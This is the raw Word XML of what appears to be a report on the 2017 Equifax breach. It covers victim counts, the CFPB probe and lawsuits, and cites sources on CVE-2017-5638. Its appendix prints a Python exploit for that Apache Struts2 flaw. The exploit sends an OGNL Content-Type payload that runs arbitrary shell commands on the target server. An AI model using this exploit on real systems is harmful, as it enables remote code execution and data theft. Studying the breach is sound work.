          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, u</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2F57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nlike the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>previous</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2F57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> victims, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Equifax stated that</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2F57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the only personal data breached for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the latest victims were driver’s</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2F57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> license numbers. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This report confirms that the actual number of victims, due to poor reporting and system maintenance, as well as the reach of the deep web, leaves a lot of speculation as to how many users were affected</w:t>
      </w:r>
      <w:r w:rsidR="00882C80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E8EBD3" w14:textId="45D6BC15" w:rsidR="00DF2F57" w:rsidRPr="00882C80" w:rsidRDefault="00882C80" w:rsidP="003946C8">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Investigations followed the release, as to the culprit responsible for not properly securing user data</w:t>
      </w:r>
      <w:r w:rsidR="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. However, according to more recent reports, the </w:t>
      </w:r>
      <w:r w:rsidR="003946C8" w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">head of the Consumer Financial Protection Bureau, has </w:t>
      </w:r>
      <w:r w:rsidR="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">decided to pull away from the said investigation. According to Reuters, after </w:t>
      </w:r>
      <w:r w:rsidR="003946C8" w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cordray resigned in November and was replaced by Mulvaney, President Donald Trump’s budget chief.</w:t>
      </w:r>
      <w:r w:rsidR="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> However, </w:t>
      </w:r>
      <w:r w:rsidR="003946C8" w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Equifax has said it is under investigation by every state attorney general and faces more than 240 class action lawsuits.</w:t>
      </w:r>
      <w:r w:rsidR="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> In one specific case, t</w:t>
      </w:r>
      <w:r w:rsidRPr="00882C80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">he company is also looking at a class action lawsuit that claims $68.6 billion </w:t>
      </w:r>
      <w:r w:rsidR="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>in exclusive of penalties.</w:t>
      </w:r>
      <w:r w:rsidRPr="00882C80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Shares have plummeted</w:t>
      </w:r>
      <w:r w:rsidRPr="00882C80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>for the company as well</w:t>
      </w:r>
      <w:r w:rsidRPr="00882C80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>as Equifax basically has fallen, but will very little consequences</w:t>
      </w:r>
      <w:r w:rsidRPr="00882C80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F279FF" w14:textId="1F3EED20" w:rsidR="00927312" w:rsidRPr="00882C80" w:rsidRDefault="00927312" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882C80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="603F4EA7" w14:textId="77777777" w:rsidR="000E4CC2" w:rsidRPr="003946C8" w:rsidRDefault="000E4CC2" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B30E1AF" w14:textId="27BB8739" w:rsidR="00681BF6" w:rsidRPr="003946C8" w:rsidRDefault="004D5F52" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B440FAD"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i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>All Products and Solutions | Business | Equifax</w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, www.equifax.com/business/all-products/. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1A265B"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i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Aruba Enterprise Wireless LAN Solutions</w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-002.txt. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3E47F9"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“Apache Software Foundation.” </w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S2-045 - Apache Struts 2 Documentation - Apache Software Foundation</w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, cwiki.apache.org/confluence/display/WW/S2-045. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135C1046"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Haselton, Todd. “Credit Reporting Firm Equifax Says Data Breach Could Potentially Affect 143 Million US Consumers.” </w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CNBC</w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, CNBC, 8 Sept. 2017, www.cnbc.com/2017/09/07/credit-reporting-firm-equifax-says-cybersecurity-incident-could-potentially-affect-143-million-us-consumers.html. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE907CC"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Kircher@4evrmalone, Madison Malone. “Turns Out That Equifax Hack Was Even Worse Than We Thought.” </w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Intelligencer</w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, 1 Mar. 2018, nymag.com/intelligencer/2018/03/equifax-identifies-2-4-million-hack-victims-in-data-breach.html. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDD0A0D"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Locker, Melissa. “Equifax Has A Super Shady History That Might Explain Its Shady Present.” </w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fast Company</w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, Fast Company, 8 Sept. 2017, www.fastcompany.com/40464730/equifax-has-a-super-shady-history-that-might-explain-its-shady-present. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD798F8" w14:textId="4FC83D30"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Pr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nergy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> C</w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ommerce. “Oversight of the Equifax Data Breach: Answers for Consumers.” </w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>YouTube</w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, YouTube, 3 Oct. 2017, www.youtube.com/watch?v=4pgg2LCY8iE. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331452DD" w14:textId="4AD8E571" w:rsid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Equifax. “Rick Smith, Chairman and CEO of Equifax, on Cybersecurity Incident Involving Consumer Data.” </w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>YouTube</w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, YouTube, 7 Sept. 2017, www.youtube.com/watch?v=bh1gzJFVFLc. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE6FF95" w14:textId="6B2C831D" w:rsidR="003946C8" w:rsidRPr="003946C8" w:rsidRDefault="003946C8" w:rsidP="003946C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Rucker, Patrick. “Exclusive: U.S. Consumer Protection Official Puts Equifax Probe on...” </w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reuters</w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, Thomson Reuters, 5 Feb. 2018, www.reuters.com/article/us-usa-equifax-cfpb/exclusive-u-s-consumer-protection-official-puts-equifax-probe-on-ice-sources-idUSKBN1FP0IZ. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBBA9EC"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“The Equifax Data Breach.” </w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The CPA Journal</w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, 21 Dec. 2017, www.cpajournal.com/2017/12/15/equifax-data-breach/. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1372A112"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“The Equifax Data Breach: What to Do.” </w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Consumer Information</w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, 13 Mar. 2018, www.consumer.ftc.gov/blog/2017/09/equifax-data-breach-what-do. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F99FD51"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Woo, Vex. “Exploit.” </w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exploits Database by Offensive Security</w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, www.exploit-db.com/exploits/41570/. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4197D4BB"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“You Are Viewing This Page in an Unauthorized Frame Window.” </w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NVD - Cve-2017-5638</w:t>
      </w:r>
      <w:r w:rsidRPr="003946C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, nvd.nist.gov/vuln/detail/CVE-2017-5638. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3940A096" w14:textId="77777777" w:rsidR="00DF2F57" w:rsidRDefault="00DF2F57" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4473CB8B" w14:textId="77777777" w:rsidR="00C73724" w:rsidRDefault="00C73724">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B444E96" w14:textId="5E42D1B4" w:rsidR="000E4CC2" w:rsidRDefault="000E4CC2" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0677C5B1" w14:textId="37290170" w:rsidR="000E4CC2" w:rsidRPr="000E4CC2" w:rsidRDefault="000E4CC2" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Python script similar to exploit carried out on parser for Equifax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B80E7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#!/usr/bin/python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A10B0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 coding: utf-8 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D49FF35"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6AD0428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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52964B8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httplib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADC635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DAFC2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0778C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def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exploit(url, cmd):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B1F8C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"%{(#_='multipart/form-data')."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A2063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"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D56C0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"(#_memberAccess?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569E591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"(#_memberAccess=#dm):"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CC3CD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"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D47DA0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"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68832B8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"(#ognlUtil.getExcludedPackageNames().clear())."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B29F21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"(#ognlUtil.getExcludedClasses().clear())."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63388B6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"(#context.setMemberAccess(#dm))))."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B49F49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"(#cmd='%s')."</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F385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"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7A5C7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"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343A619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"(#p=new java.lang.ProcessBuilder(#cmds))."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBE398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"(#p.redirectErrorStream(true)).(#process=#p.start())."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B1531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"(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CEA1C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"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D204C9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"(#ros.flush())}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B282BA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F1E9E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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AD94A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headers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{'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722D6A3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request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urllib2.Request(url, headers=headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5351AB9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urllib2.urlopen(request).read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F31467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except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httplib.IncompleteRead, e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2069A91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e.partial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10897B8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0553BFA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print(page)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EC67E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return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page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205BA50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76D78EC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68E5FA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__name__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'__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF99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sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282EB0A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len(sys.argv)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3:</w:t>
      </w:r>
